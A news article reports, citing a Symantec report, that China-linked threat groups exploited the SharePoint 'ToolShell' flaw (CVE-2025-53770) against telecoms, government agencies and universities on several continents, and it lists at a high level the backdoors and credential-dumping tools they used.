Hackers believed to be linked to China have exploited a critical Microsoft SharePoint vulnerability known as ToolShell (CVE-2025-53770) in a series of attacks against government departments, universities, telecommunications providers and finance firms across multiple continents.
The flaw, which affects on-premises SharePoint servers, was disclosed as an actively exploited zero-day on July 20. Microsoft issued emergency updates the following day. Security researchers say ToolShell functions as a bypass for two earlier vulnerabilities (CVE-2025-49706 and CVE-2025-49704) that can be abused remotely without authentication to achieve code execution and full file-system access.
Microsoft has previously attributed exploitation of ToolShell to three China-linked threat groups known as Budworm/Linen Typhoon, Sheathminer/Violet Typhoon and Storm-2603/Warlock ransomware.
According to a new report from Broadcom-owned Symantec, exploitation is broader than was initially thought, with compromises spanning the Middle East, South America, the United States, Africa and Europe.
Symantec says it has observed activity targeting a Middle Eastern telecommunications provider that began on July 21, when attackers exploited CVE-2025-53770 to plant webshells and establish persistent access. The campaign then used DLL side-loading to deploy a Go-based backdoor dubbed Zingdoor and what researchers believe to be the ShadowPad trojan, followed by the Rust-based KrustyLoader and the Sliver post exploitation framework.
The attackers leveraged living-off-the-land and publicly available tools, including credential-dumping via ProcDump, Minidump and LsassDumper, and abuse of the PetitPotam NTLM relay attack (CVE-2021-36942) to pursue domain compromise. The the threat actor has also side-loaded legitimate Trend Micro and Bitdefender executables and used the Certutil utility, as well as the GoGo Scanner and the Revsocks exfiltration tool.
“The attackers also gained access to the networks of two government agencies in South America and a university in the U.S. recently. In these attacks, the attackers used other vulnerabilities for initial access and exploited SQL servers and Apache HTTP servers running the Adobe ColdFusion software to deliver their malware,” the researchers noted.
Symantec says that the observed campaigns indicate that ToolShell has been leveraged by more Chinese-linked groups than previously reported.
“These attacks demonstrate that the ToolShell vulnerability was being exploited by an even wider range of Chinese threat actors than was originally thought,” the cybersecurity firm said. “There is some overlap in the types of victims and some of the tools used between this activity and activity previously attributed to Glowworm. However, we do not have sufficient evidence to conclusively attribute this activity to one specific group, though we can say that all evidence points to those behind it being China-based threat actors.”